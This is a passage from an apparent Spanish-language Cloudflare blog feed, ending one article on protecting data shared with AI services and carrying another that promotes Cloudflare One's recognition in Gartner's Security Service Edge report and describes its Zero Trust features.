para un servicio de IA. El conjunto de medidas de seguridad de Cloudflare One va más allá de los usuarios humanos y puede ofrecer a los equipos la capacidad de compartir de forma segura el acceso Zero Trust a datos confidenciales a través de las API.</p><p>En primer lugar, los equipos pueden crear <a href="https://developers.cloudflare.com/cloudflare-one/identity/service-tokens/">tokens de servicio</a> que los servicios externos deben presentar para acceder a los datos disponibles a través de Cloudflare One. Los administradores pueden proporcionar estos tokens a los sistemas que realicen solicitudes API y registrar cada solicitud. Cuando sea necesario, los equipos pueden revocar estos tokens con un solo clic.</p><p>Después de crear y emitir tokens de servicio, los administradores pueden crear políticas para permitir el acceso de servicios específicos a sus datos de entrenamiento. Estas políticas verificarán el token de servicio y se pueden ampliar para verificar el país, la dirección IP o un certificado mTLS. También se pueden crear políticas para exigir a los usuarios humanos que se autentiquen con un proveedor de identidad y completen una solicitud de autenticación multifactor (MFA) antes de acceder a datos o servicios de entrenamiento confidenciales.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5MImi9GeUWltY5DOFwvMSh/c2d8358832bd18a88bdbc5e38bd12fb5/download-7.png" />
            
            </figure><p>Cuando los equipos estén preparados para permitir que un servicio de IA se conecte a su infraestructura, pueden hacerlo sin crear agujeros en sus firewalls gracias al uso de Cloudflare Tunnel. <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-apps/">Cloudflare Tunnel</a> creará una conexión cifrada, y solo de salida, a la red de Cloudflare, donde cada solicitud se cotejará con las reglas de acceso configuradas para uno o más servicios protegidos por Cloudflare One.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6AsBiCcSRRs2cB0fX91qFb/d6235e9b8e6ab10b8b1370811aa8336f/download--1--4.png" />
            
            </figure><p>El control de acceso Zero Trust de Cloudflare te ofrece la posibilidad de imponer la autenticación en todas y cada una de las solicitudes realizadas a los datos que tu organización decida proporcionar a estas herramientas. Sin embargo, los miembros de tu equipo podrían seguir compartiendo información por su cuenta.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TXIWdwYglW1oueAfgVY3e/5136b53e234f770692a00f569edfdc84/download--2--3.png" />
            
            </figure>
    <div>
      <h3>Restringe la carga de datos</h3>
      <a href="#restringe-la-carga-de-datos">
        
      </a>
    </div>
    <p>Los administradores pueden seleccionar un servicio de IA, bloquear las alternativas de Shadow IT y controlar cuidadosamente el acceso a su material de entrenamiento, pero en estos experimentos de IA siguen interviniendo seres humanos. Cualquiera de nosotros puede provocar accidentalmente un incidente de seguridad si compartimos información en exceso durante el proceso de uso de un servicio de IA, incluso un servicio autorizado.</p><p>Esperamos que los campos de juego de la IA sigan evolucionando para ofrecer más capacidades de gestión de datos, pero no creemos que debas esperar para empezar a adoptar estos servicios como parte de tu flujo de trabajo. El servicio de <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-policies/">prevención de pérdida de datos</a> (DLP) de Cloudflare puede ofrecer protección para evitar compartir en exceso antes de que se convierta en un incidente para tu equipo de seguridad.</p><p>En primer lugar, dinos qué datos te preocupan. Ofrecemos opciones sencillas y preconfiguradas que te dan la posibilidad de comprobar datos que parecen números de la seguridad social o de tarjetas de crédito. Nuestra herramienta también puede buscar patrones basados en expresiones regulares configuradas por tu equipo.</p><p>Una vez que hayas definido los datos que nunca deben salir de tu organización, puedes crear reglas granulares sobre cómo pueden y no pueden compartirse con los servicios de IA. Tal vez algunos usuarios estén autorizados a experimentar con proyectos que contienen datos confidenciales, en cuyo caso puedes crear una regla que solo permita a un grupo de Active Directory u Okta subir ese tipo de información, y bloquear al resto.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6H0NwXfAL6x2e0iccJbfTr/58c6bd1e2ee1ba39cdafaec17b1d8896/download--3--3.png" />
            
            </figure>
    <div>
      <h3>Controla el uso sin un proxy</h3>
      <a href="#controla-el-uso-sin-un-proxy">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15YcMzIxUHycVsceeYjlTr/3ee7c0b98d067656377ee5a188fcc100/download--4--3.png" />
            
            </figure><p>Las herramientas de la publicación del blog de hoy se centran en las funciones que se aplican a los datos en movimiento. También queremos asegurarnos de que las configuraciones erróneas en las aplicaciones no vulneren la seguridad. Por ejemplo, la nueva función de complemento de ChatGPT incorpora el conocimiento y los flujos de trabajo de servicios externos en el flujo de interacción de la IA. Sin embargo, esta novedad también puede otorgar más acceso del deseado a los servicios de los complementos.</p><p>El <a href="https://www.cloudflare.com/es-es/products/zero-trust/casb/">agente de seguridad de acceso a la nube</a> (CASB) de Cloudflare analiza tus aplicaciones SaaS en busca de posibles problemas que puedan surgir cuando los usuarios realizan cambios. Ya sea alertándote de archivos que alguien acaba de hacer públicos accidentalmente en Internet o comprobando que tus <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/github/#security-findings">repositorios de GitHub tienen los controles de suscripción adecuados</a>, el CASB de Cloudflare elimina el trabajo manual necesario para comprobar todos y cada uno de los ajustes en busca de posibles problemas en tus aplicaciones SaaS.</p><p>Estamos trabajando en nuevas integraciones con servicios de IA populares, disponibles próximamente, para comprobar si hay configuraciones erróneas. Como la mayoría de los usuarios de estos servicios, seguimos aprendiendo sobre dónde se pueden producir accidentes potenciales, y estamos encantados de proporcionar a los administradores que utilizan nuestro CASB nuestra primera oleada de controles para los servicios de IA.</p>
    <div>
      <h3>¿Y después?</h3>
      <a href="#y-despues">
        
      </a>
    </div>
    <p>La utilidad de estas herramientas no hará sino acelerarse. La capacidad de los servicios de IA para entrenar y generar resultados seguirá facilitando a los desarrolladores, sin importar su experiencia, la creación de su próxima aplicación asombrosa.</p><p>Compartimos un objetivo similar. Nuestra <a href="https://workers.cloudflare.com/">plataforma Workers</a>, que incluye los productos de Cloudflare cuyo objetivo es ayudar a los usuarios a crear aplicaciones y servicios, elimina la preocupación del lugar en el que implementar tu aplicación o cómo escalar tus servicios. Cloudflare resuelve estas dificultades para que los usuarios puedan centrarse en desarrollar. Junto con los servicios de IA, esperamos ver a miles de nuevos desarrolladores lanzar la próxima oleada de productos creados en Cloudflare e inspirados en el entrenamiento y la generación de IA.</p><p>Ya hemos visto el desarrollo de docenas de proyectos en Cloudflare Workers utilizando la orientación de herramientas como ChatGPT. Tenemos previsto lanzar nuevas integraciones con estos modelos para que este objetivo sea aún más fácil, aportando mejor orientación específica de Cloudflare a la experiencia de chat.</p><p>También sabemos que el riesgo de seguridad de estas herramientas irá en aumento. Seguiremos implementando funciones en Cloudflare One con el objetivo de ir un paso por delante de los riesgos a medida que evolucionan con estos servicios. ¿Todo listo para empezar? Regístrate aquí para empezar a utilizar Cloudflare One, gratuito para equipos de hasta 50 usuarios.</p><div></div> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[AI Gateway (ES)]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <guid isPermaLink="false">cjRZze7V6ngCFB6l6WhGT</guid>
            <dc:creator>Sam Rhea</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare One mencionado en Gartner® Magic Quadrant™ for Security Service Edge]]></title>
            <link>https://blog.cloudflare.com/es-es/cloudflare-sse-gartner-magic-quadrant/</link>
            <pubDate>Thu, 13 Apr 2023 15:13:42 GMT</pubDate>
            <description><![CDATA[ Cloudflare Zero Trust mencionado en Gartner® Magic Quadrant™ for Security Service Edge ]]></description>
            <content:encoded><![CDATA[ <p>Gartner ha reconocido a Cloudflare en el informe "Gartner® Magic Quadrant™ for Security Service Edge (SSE) 2023" por su capacidad de ejecución y visión integral. Nos complace compartir que con la solución <a href="https://www.cloudflare.com/products/zero-trust/">Cloudflare Zero Trust</a>, parte de nuestra plataforma <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One</a>, somos uno de los diez proveedores reconocidos en el informe.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5f8Dl6fedmDRmheRrIf5vt/8b0e7ecef14733a971eb13ad97094b19/unnamed--1-.png" />
            
            </figure><p>De las 10 empresas nombradas en el informe Gartner® Magic Quadrant™ de este año, Cloudflare es el único nuevo proveedor añadido. Puedes obtener más información sobre nuestra posición en el informe y lo que dicen los clientes acerca de la utilización de Cloudflare One <a href="https://cloudflare.com/lp/gartner-magic-quadrant-sse-2023/">aquí</a>.</p><p>Cloudflare también es el proveedor más nuevo si se tiene en cuenta la fecha de lanzamiento de nuestros primeros productos en el espacio de SSE. <a href="/cloudflare-access-now-teams-of-any-size-can-turn-off-their-vpn/">Lanzamos Cloudflare Access</a>, nuestro producto de control de acceso Zero Trust, el mejor de su clase, aún no hace cinco años. Desde entonces, hemos lanzado cientos de funciones, así como docenas de otros productos para crear una solución SSE integral en la que confían 10 000 organizaciones para mantener la seguridad y velocidad de sus datos, sus dispositivos y sus equipos. Avanzamos tan rápido porque desarrollamos Cloudflare One sobre la misma red que ya protege y acelera amplios segmentos de Internet en la actualidad.</p><p>Proporcionamos nuestros servicios SSE en los mismos servidores y en las mismas ubicaciones que algunas de las propiedades de Internet más grandes del mundo. Combinamos las ventajas existentes, como el <a href="https://1.1.1.1/">solucionador DNS más rápido del mundo</a>, la plataforma de <a href="https://workers.cloudflare.com/">computación sin servidor</a> de Cloudflare y nuestra capacidad de <a href="/network-performance-update-cio-edition/">dirigir y acelerar el tráfico</a> en todo el mundo. Podemos ser nuevos en el informe, pero los clientes que seleccionan Cloudflare One no están apostando por un proveedor recién llegado. Eligen una solución líder del sector que ha sido posible gracias a una red que ya protege millones de destinos y a miles de millones de usuarios a diario.</p><p>Nos sentimos halagados por el reconocimiento de Gartner de esta semana y aún más entusiasmados por los resultados que logramos actualmente para nuestros clientes. Dicho esto, aún podemos conseguir mucho más y nuestro avance es cada vez más rápido.</p>
    <div>
      <h2>¿Qué es Security Service Edge?</h2>
      <a href="#que-es-security-service-edge">
        
      </a>
    </div>
    <p>Una solución <a href="https://www.cloudflare.com/learning/access-management/security-service-edge-sse/">Security Service Edge</a> (SSE) "protege el acceso a la web, los servicios en la nube y las aplicaciones privadas. Incluye funciones como el control de acceso, la protección contra amenazas, la seguridad de datos, la supervisión de la seguridad y control de uso aceptable mediante una integración basada en la red y en la API. SSE se proporciona principalmente como un servicio basado en la nube, y puede incluir componentes locales o basados en agentes".1</p><p>El espacio SSE se desarrolló para ayudar a las organizaciones que afrontaban un nuevo tipo de problemas de seguridad. Hace unos años, los equipos podían proteger sus dispositivos, sus servicios y sus datos manteniéndolos ocultos del resto del mundo con un modelo perimetral. El perímetro de protección de una empresa correspondía, literalmente, a las paredes de sus oficinas. Las aplicaciones se ejecutaban en armarios de servidores o en centros de datos autogestionados. Las empresas podían implementar firewalls, proxies y dispositivos de filtrado en forma de hardware local. Los usuarios remotos padecían la configuración con los redireccionamientos de su tráfico a través de la oficina física con un cliente de red privada virtual (VPN) heredado.</p><p>Ese modelo empezó a desintegrarse cuando las aplicaciones empezaron a salir del edificio. Los equipos empezaron a migrar a herramientas SaaS y a proveedores de nube pública. Ya no podían controlan la seguridad colocando dispositivos físicos en el flujo de su única ruta a Internet.</p><p>Entretanto, los usuarios también abandonaron la oficina, lo que supuso más presión sobre la capacidad de una red privada autogestionada que pudiera escalarse con el tráfico. El rendimiento y la disponibilidad se vieron afectados, al mismo tiempo que los costes aumentaban a medida que las organizaciones incrementaban su tráfico e implementaban más medidas tácticas para intentar ganar tiempo.</p><p>Los actores maliciosos también desempeñaron un papel. Los ataques eran cada vez más sofisticados y se aprovechaban de la migración fuera del perímetro de seguridad clásico. Los dispositivos heredados implementados ya no podían seguir el ritmo de los cambios en los patrones de ataque y la escala de los ataques.</p><p>Los proveedores de SSE proporcionan a las organizaciones una solución basada en la nube para resolver estos desafíos. Los proveedores de SSE implementan y mantienen los servicios de seguridad en sus propios puntos de presencia o en un proveedor de nube pública, y proporcionan a las empresas un primer salto seguro antes de que se conecten al resto de Internet o a sus herramientas internas. Los equipos de TI pueden dejar de utilizar los dispositivos físicos o virtuales que han dedicado días a mantener. Los equipos de seguridad se benefician de filtrado y de políticas que se actualizan constantemente para proporcionar protección contra las nuevas amenazas.</p><p>El objetivo de algunas funciones SSE es la sustitución del acceso remoto, y ofrecen a los clientes la capacidad de conectar a los usuarios con las herramientas internas mediante reglas de control de acceso Zero Trust. Otros componentes de una plataforma SSE se centran en la aplicación de un escrutinio Zero Trust al resto de Internet, y sustituyen los dispositivos de filtrado locales de una empresa por firewalls, solucionadores y proxies basados en la nube que filtran y registran el tráfico que sale de un dispositivo más cerca del usuario, en lugar de forzar un redireccionamiento a una ubicación centralizada.</p>
    <div>
      <h3>¿Y SASE?</h3>
      <a href="#y-sase">
        
      </a>
    </div>
    <p>Es posible que también esté familiarizado con el término <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/">Secure Access Service Edge</a> (SASE). Escuchamos a nuestros clientes hablar acerca de sus objetivos de "SASE" más a menudo que de "SSE" únicamente. SASE amplía la definición de SSE para incluir la gestión de la conectividad del tráfico que se protege. Los proveedores de red como servicio conectan sus usuarios, dispositivos, sitios y servicios. Los proveedores de SSE protegen ese tráfico.</p><p>La mayoría de los proveedores se centran solo en un lado de la ecuación. Las empresas de red como servicio venden soluciones de red de area ancha (SD-WAN), interconexión y optimización del tráfico definidas por software, para ayudar a las empresas a gestionar y acelerar la conectividad. Sin embargo, estas empresas acaban perdiendo estas ventajas al enviar todo ese tráfico a un proveedor SSE para el filtrado. Los proveedores de SSE proporcionan herramientas de seguridad para tráfico de prácticamente cualquier tipo, pero siguen necesitando que los clientes compren servicios de red adicionales para llevar ese tráfico a sus ubicaciones.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2rkvq7XmV0DpUVvfW7Rew7/c4564c1b87eceaca28eee35ea3cedff4/Screenshot-2023-03-01-at-16.30.12.png" />
            
            </figure><p>Cloudflare One es una plataforma SASE de un solo proveedor. Cloudflare ofrece a las empresas un servicio de red como servicio integral donde los equipos pueden enviar todo el tráfico a la red de Cloudflare, donde podemos ayudar a los equipos a gestionar la conectividad y mejorar el rendimiento. Las empresas pueden elegir entre accesos flexibles, como sus enrutadores de hardware existentes, agentes que se ejecutan en portátiles y dispositivos móviles, interconexiones físicas y virtuales o el <a href="/magic-wan-connector/">propio conector de última milla</a> de Cloudflare.</p><p>Cuando el tráfico llega a la red de Cloudflare, nuestros servicios SSE aplican filtrado de seguridad en las mismas ubicaciones donde gestionamos y direccionamos la conectividad. La solución SSE de Cloudflare no añade saltos adicionales. Proporcionamos filtrado y registro en línea con el tráfico que aceleramos para nuestros clientes. El valor de nuestra solución SASE de un solo proveedor es solo otro resultado de nuestra obsesión, desde que lanzamos nuestro primer proxy inverso hace más de diez años, de que los clientes no deberían tener que realizar concesiones de rendimiento en aras de la seguridad, ni viceversa.</p>
    <div>
      <h2>¿Cómo se integra Cloudflare One en este enfoque?</h2>
      <a href="#como-se-integra-cloudflare-one-en-este-enfoque">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One</a> conecta las empresas a las herramientas que necesitan, al mismo tiempo que protege sus dispositivos, sus aplicaciones y sus datos sin poner en riesgo el rendimiento. La plataforma consta de dos componentes principales: nuestros productos Cloudflare Zero Trust, que representan nuestra solución SSE, y nuestra solución de red como servicio. Aunque el anuncio de hoy separa estas funciones, preferimos hablar sobre cómo funcionan juntas.</p><p>La solución de red como servicio de Cloudflare, nuestra solución Magic WAN, amplía nuestra red para que los clientes la usen como la suya propia. Las empresas pueden aprovechar las inversiones que hemos realizado durante más de una década para desarrollar una de las redes más emparejadas, más eficientes y más disponibles del mundo. Los equipos pueden utilizar Cloudflare para conectar dispositivos de itinerancia, oficinas y sitios físicos individuales, o bien redes y centros de datos completos, al resto de Internet o a destinos internos.</p><p>Queremos que nuestros clientes nos puedan enviar su tráfico de la forma más fácil posible. Con ese fin, proporcionamos muchos accesos flexibles para que se ajusten fácilmente en su infraestructura existente. Las empresas pueden utilizar nuestro agente de itinerancia para conectar los dispositivos de usuario, nuestro servicio Cloudflare Tunnel para la conectividad a nivel de aplicación, túneles a nivel de red desde nuestro <a href="/magic-wan-connector/">conector Magic WAN</a> o su enrutador existente o hardware de SD-WAN, así como interconexiones virtuales o físicas directas para la conectividad dedicada a la infraestructura local o de nube en más de 1600 ubicaciones de todo el mundo. Cuando los paquetes llegan a la ubicación de Cloudflare más cercana, proporcionamos optimización, aceleración y registro para que los clientes tengan visibilidad de sus flujos de tráfico.</p><p>En lugar de enviar ese tráfico acelerado a un intermediario adicional para el filtrado de seguridad, nuestra plataforma Cloudflare Zero Trust puede encargarse de proporcionar el filtrado de seguridad SSE en la misma ubicación (normalmente en ese mismo servidor) que nuestras funciones de red como servicio. Las empresas pueden elegir qué funciones SSE desean habilitar para reforzar su postura de seguridad con el tiempo.</p>
    <div>
      <h2>Cloudflare One y el conjunto de funciones SSE</h2>
      <a href="#cloudflare-one-y-el-conjunto-de-funciones-sse">
        
      </a>
    </div>
    <p>Las funciones de seguridad de Cloudflare One proporcionan cobertura SSE integral a las empresas, sea cual sea la escala a la que operen. Los clientes simplemente necesitan enviar el tráfico a una ubicación de Cloudflare, a pocos milisegundos de sus usuarios, y Cloudflare Zero Trust se encarga del resto.</p>
    <div>
      <h3>Funcionalidades SSE de Cloudflare One</h3>
      <a href="#funcionalidades-sse-de-cloudflare-one">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7J0yjZm1I1A6k2VoaoM3DI/020161dc87ae633b0c791ec81a80004c/2fUYKtUxdMunJRmzZBz89PTwIW1ks_TR9qk7CoLnFVC_P8603M3x7o2MXqPkpAO5FmVj4Ew6eYBSsbQn6WfQ2wJEnwfNHE8Rf0vmQfCg1AqMsjjzVTLpneY1sVuT.png" />
            
            </figure><p><i><b>Control de acceso Zero Trust</b></i>Cloudflare <a href="https://www.cloudflare.com/products/zero-trust/access/">proporciona un reemplazo de VPN Zero Trust</a> para los equipos que alojan y controlan sus propios recursos. Los clientes pueden implementar una red privada dentro de una red de Cloudflare si desean una conectividad más tradicional, o bien ampliar el acceso a los proveedores sin necesidad de ningún agente. Independientemente de cómo se conecten los usuarios, y sea cual sea el tipo de destino que necesiten, la red de Cloudflare proporciona a los administradores la capacidad de <a href="https://developers.cloudflare.com/cloudflare-one/policies/access/">crear reglas detalladas</a> por recurso o a nivel global. Los equipos pueden combinar uno o más <a href="https://developers.cloudflare.com/cloudflare-one/identity/">proveedores de identidad</a>, entradas de la <a href="https://developers.cloudflare.com/cloudflare-one/identity/devices/">postura del dispositivo</a> y otras fuentes de señal para determinar cuándo y cómo un usuario debe poder conectarse.</p><p>Las organizaciones también pueden ampliar estos tipos de reglas de control de acceso Zero Trust <a href="/cloudflare-access-for-saas/">a las aplicaciones SaaS</a>, donde no controlan el alojamiento al introducir el proxy de identidad de Cloudflare en el flujo de inicio de sesión. Pueden continuar utilizando su proveedor de identidad existente pero añadir comprobaciones adicionales como la postura del dispositivo, el país y el método multifactor.</p><p><i><b>Filtrado de DNS</b></i>La solución de filtrado de DNS de Cloudflare se ejecuta en el solucionador DNS más rápido del mundo, que filtra y registra las consultas DNS que salen tanto de dispositivos individuales como de algunas de las <a href="/helping-keep-governments-safe-and-secure/">redes más grandes del mundo</a>.</p><p><i><b>Firewall de red</b></i>Las organizaciones que mantienen firewalls de hardware local o equivalentes basados en la nube pueden dejar de utilizar sus dispositivos y enviar el tráfico mediante Cloudflare, donde nuestro <a href="https://www.cloudflare.com/magic-firewall/">firewall como servicio</a> puede filtrar y registrar el tráfico. Nuestro firewall de red incluye filtrado de capa 3 y capa 7, detección de intrusiones e integraciones directas con nuestras fuentes de información sobre amenazas y el resto de nuestro conjunto de soluciones SSE. Permite a los equipos de seguridad crear sofisticadas políticas sin ninguno de los problemas del hardware tradicional: sin planificación de la capacidad o la redundancia, sin restricciones de rendimiento y sin parches ni actualizaciones manuales.</p><p><i><b>Puerta de enlace web segura</b></i>El servicio <a href="https://www.cloudflare.com/products/zero-trust/gateway/">Secure Web Gateway</a> (SWG) de Cloudflare inspecciona, filtra y registra el tráfico en un punto de presencia (PoP) de Cloudflare cerca del usuario, dondequiera que este trabaje. SWG puede bloquear las solicitudes HTTP vinculadas a destinos peligrosos, analizar el tráfico en busca de virus y malware, y controlar cómo el tráfico se direcciona al resto de Internet sin necesidad de hardware o servicios virtualizados adicionales.</p><p><i><b>Agente de seguridad de acceso a la nube en línea y Shadow IT</b></i>La proliferación de las aplicaciones SaaS puede ayudar a los equipos a reducir los costes, pero implica un riesgo real. A veces, los usuarios prefieren herramientas que no son aquellas que han seleccionado sus equipos de seguridad o de TI. El agente de seguridad de acceso a la nube (CASB) en línea de Cloudflare proporciona a los administradores las herramientas que necesitan para garantizar que los usuarios utilizan las aplicaciones SaaS según lo previsto. Los equipos pueden crear reglas de control de inquilinos que restrinjan a los usuarios el inicio de sesión en cuentas personales y políticas que permitan cargar únicamente determinados tipos de aplicaciones SaaS aprobadas, así como filtros que restrinjan a los usuarios la utilización de los servicios no aprobados.</p><p>El servicio <a href="/introducing-shadow-it-discovery/">"Shadow IT"</a> de Cloudflare analiza y cataloga el tráfico de los usuarios a Internet para ayudar a los equipos de TI y de seguridad a detectar y supervisar el uso no autorizado de aplicaciones SaaS. Por ejemplo, los equipos pueden garantizar que su almacenamiento en la nube aprobado es la única ubicación donde los usuarios pueden cargar materiales.</p><p><i><b>Agente de seguridad de acceso a la nube basado en API</b></i>El superpoder de Cloudflare es nuestra red. Sin embargo, a veces los peores ataques empiezan con los datos en reposo. Los equipos que adoptan aplicaciones SaaS pueden compartir productos de trabajo y colaborar desde cualquier ubicación. Esta misma comodidad es lo que facilita que errores o actores maliciosos puedan causar una grave fuga de datos.</p><p>En algunos casos, los usuarios podrían compartir en exceso un documento con información confidencial al seleccionar el botón incorrecto en el menú "Compartir". Con solo un clic, una hoja de cálculo con datos de contacto de los clientes podría estar disponible públicamente en Internet. En otras situaciones, los usuarios podrían compartir un informe con su cuenta personal sin ser conscientes de que infringen las reglas internas de cumplimiento.</p><p>Independientemente de cómo se haya iniciado la potencial fuga de datos, el <a href="https://www.cloudflare.com/products/zero-trust/casb/">CASB basado en API</a> de Cloudflare analiza constantemente las aplicaciones SaaS que utiliza tu equipo en busca de posibles configuraciones incorrectas o pérdidas de datos. Cuando las detecta, el CASB de Cloudflare alertará a los administradores y proporcionará una guía completa para corregir el incidente.</p><p><i><b>Prevención de pérdida de los datos</b></i>El servicio <a href="https://www.cloudflare.com/products/zero-trust/dlp/">Prevención de pérdida de datos</a> de Cloudflare analiza el tráfico para detectar y bloquear cualquier posible pérdida de datos. Los administradores pueden seleccionar los perfiles comunes ya creados, que incluyen números de la seguridad social o números de tarjeta de crédito, o bien crear sus propios criterios utilizando expresiones regulares, así como integrar con etiquetas existentes de Microsoft Information Protection.</p><p><i><b>Aislamiento remoto del navegador</b></i>El <a href="https://www.cloudflare.com/products/zero-trust/browser-isolation/">servicio de aislamiento de navegador</a> de Cloudflare ejecuta un navegador dentro de nuestra red, en un centro de datos a solo milisegundos del usuario, y envía el vector que representa la página web al dispositivo local. Los miembros del equipo pueden utilizar cualquier navegador moderno y, <a href="/cloudflare-and-remote-browser-isolation/">a diferencia de otros enfoques</a>, Internet no se diferencia en nada de Internet. Los administradores pueden aislar los sitios sobre la marcha, seleccionar aislar únicamente los destinos desconocidos o proporcionar a los proveedores una estación de trabajo sin agente. Los equipos de seguridad pueden añadir protección adicional, como por ejemplo bloquear copiar/pegar o imprimir.</p>
    <div>
      <h3>Seguridad más allá de SSE</h3>
      <a href="#seguridad-mas-alla-de-sse">
        
      </a>
    </div>
    <p>Muchos de los clientes que hablan con nosotros acerca de sus objetivos de SSE no están preparados para empezar a adoptar desde el primer día todos los servicios de seguridad de esa categoría. En su lugar, suelen tener objetivos de SSE estratégicos y problemas tácticos inmediatos. No pasa nada. <a href="https://zerotrustroadmap.org/">Podemos estar</a> dondequiera que los clientes empiecen su recorrido, y a veces ese recorrido empieza con desafíos que quedan un poco fuera del alcance de la definición actual de SSE. También podemos ayudar en estas áreas.</p><p>Muchos de los tipos de ataques que un modelo SSE tiene como objetivo evitar empiezan con un correo electrónico, pero eso no está incluido en la definición de SSE tradicional. Los objetivos de los atacantes serán usuarios específicos o toda la plantilla, y utilizarán enlaces de phishing o malware que hoy en día el filtrado por defecto de los proveedores de correo electrónico no detecta.</p><p>Queremos ayudar a los clientes a evitar estos ataques en la bandeja de entrada antes de que sea necesario aplicar funciones SSE como el filtrado de DNS o SWG. Cloudflare One incluye <a href="https://www.cloudflare.com/products/zero-trust/email-security/">seguridad del correo electrónico líder del sector</a> mediante nuestro producto Area 1 para proteger a los equipos, sea cual sea su proveedor de correo electrónico. Area 1 no es solo una solución independiente incluida en nuestra solución SSE. Las funciones de Cloudflare Zero Trust <a href="/email-link-isolation/">funcionan mejor junto con</a> Area 1. Los correos electrónicos sospechosos pueden abrir enlaces en un navegador aislado, por ejemplo, para proporcionar a los clientes un modelo de seguridad de protección integral sin el riesgo de más tickets del servicio de asistencia de TI.</p><p>Los clientes de Cloudflare One también pueden beneficiarse de otra <a href="/cloudflare-waap-named-leader-gartner-magic-quadrant-2022/">plataforma reconocida por Gartner</a>, nuestro conjunto de soluciones de seguridad de las aplicaciones. Las funciones de seguridad de las aplicaciones líderes del sector de Cloudflare, como nuestro firewall de aplicaciones web y el servicio de mitigación de DDoS, se pueden implementar en línea con nuestras funciones de seguridad Zero Trust. Los equipos pueden añadir alertas de gestión de bots, protección de API y almacenamiento en caché más rápido a sus herramientas internas, con un solo clic.</p>
    <div>
      <h2>¿Por qué Cloudflare?</h2>
      <a href="#por-que-cloudflare">
        
      </a>
    </div>
    <p>Más de 10 000 organizaciones confían en Cloudflare One para conectar y proteger su empresa. Cloudflare One ayuda a proteger y acelerar equipos que abarcan desde la organización de TI más grande del mundo, el gobierno federal de Estados Unidos, hasta miles de pequeños grupos que confían en nuestro plan gratuito. Hace un par de meses hablamos con los clientes con ocasión de nuestra <a href="https://www.cloudflare.com/cio-week/">CIO Week</a> para escuchar los motivos por los que seleccionan Cloudflare One. Sus comentarios incluían algunos <a href="/why-cios-select-cloudflare-one/">temas recurrentes</a>.</p><p><b>1) Cloudflare One proporciona seguridad más completa</b>Casi cada proveedor de SSE ofrece seguridad mejorada en comparación con el modelo perimetral tradicional, pero se puede lograr mucho más. Hemos desarrollado las funciones de seguridad de Cloudflare One para que sean las mejores de su clase. Nuestra solución de control de acceso líder del sector proporciona más opciones integradas para controlar quién puede conectarse a las herramientas de las que depende tu negocio.</p><p>Nos hemos asociado con proveedores de identidad y plataformas de protección de puntos finales líderes, como <a href="/cloudflare-partners-with-microsoft-to-protect-joint-customers-with-global-zero-trust-network/">Microsoft</a> y <a href="/cloudflare-crowdstrike-partnership/">CrowdStrike</a>, para proporcionar un reemplazo de VPN Zero Trust que sea mejor que todo lo que existe en el mercado. En el lado del filtrado de salida, cada opción de filtrado se basa en la información sobre amenazas recopilada y organizada por <a href="/introducing-cloudforce-one-threat-operations-and-threat-research/">Cloudforce One</a>, nuestro equipo dedicado a la investigación de amenazas.</p><p><b>2) Cloudflare One mejora la velocidad de tu equipo</b>Cloudflare One acelera a tus usuarios finales desde el primer momento que se conectan a Internet, empezando con el <a href="https://1.1.1.1/">solucionador de DNS más rápido del mundo</a>. Los usuarios finales envían estas consultas DNS y establecen conectividad sobre un túnel seguro optimizado basado en los comentarios de millones de usuarios que confían en nuestro popular <a href="/1111-warp-better-vpn/">proxy de reenvío de cliente</a>. Sitios completos se conectan mediante diversas opciones de túnel a la red de Cloudflare, donde somos el <a href="/network-performance-update-developer-week/">proveedor de conectividad más rápido</a> para el mayor número de las 3000 redes más grandes del mundo.</p><p>Competimos y nos medimos respecto a proveedores que ofrecen exclusivamente conectividad. Cuando nos medimos respecto a proveedores que ofrecen únicamente SSE, como Zscaler, <a href="/network-performance-update-cio-edition/">nuestro rendimiento es considerablemente superior</a>, entre el 38 % y el 59 %, según el caso de uso.</p><p><b>3) Cloudflare One es más fácil de gestionar</b>Los productos Cloudflare Zero Trust son únicos en el mercado de SSE, puesto que ofrecemos un plan gratuito que incluye prácticamente todas las funciones. Proporcionamos estos servicios de forma gratuita a grupos de hasta 50 usuarios, porque creemos que la seguridad en Internet debería ser accesible para todos, sea cual sea su presupuesto.</p><p>Una consecuencia de este compromiso es que hemos desarrollado productos que deben ser fáciles de usar. A diferencia de otros proveedores de SSE que solo venden a empresas y pueden contar con integradores de sistemas grandes para la implementación, nosotros hemos tenido que crear una solución que cualquier equipo pueda implementar. Desde <a href="/cloudflare-zero-trust-for-galileo-and-athenian/">organizaciones en defensa de los derechos humanos</a> que no disponen de departamentos de TI a tiempo completo hasta <a href="/startup-program-v2/">empresas emergentes</a> que desean dedicar más tiempo al desarrollo y menos a preocuparse acerca de las vulnerabilidades.</p><p>También sabemos que los administradores quieren tener más opciones, no solo un panel de control intuitivo. Proporcionamos <a href="https://api.cloudflare.com/">soporte de API</a> para gestionar cada una de las funciones de Cloudflare One, y mantenemos un <a href="https://developers.cloudflare.com/cloudflare-one/api-terraform/access-with-terraform/">proveedor de Terraform</a> para los equipos que necesitan la opción de gestión de la configuración como código revisada por colegas.</p><p><b>4) Cloudflare One es la solución SASE integral más rentable</b>Cloudflare es responsable de entregar y proteger millones de sitios web en Internet cada día. Para poder admitir ese volumen de tráfico, tuvimos que <a href="/cloudflares-gen-x-servers-for-an-accelerated-future/">desarrollar 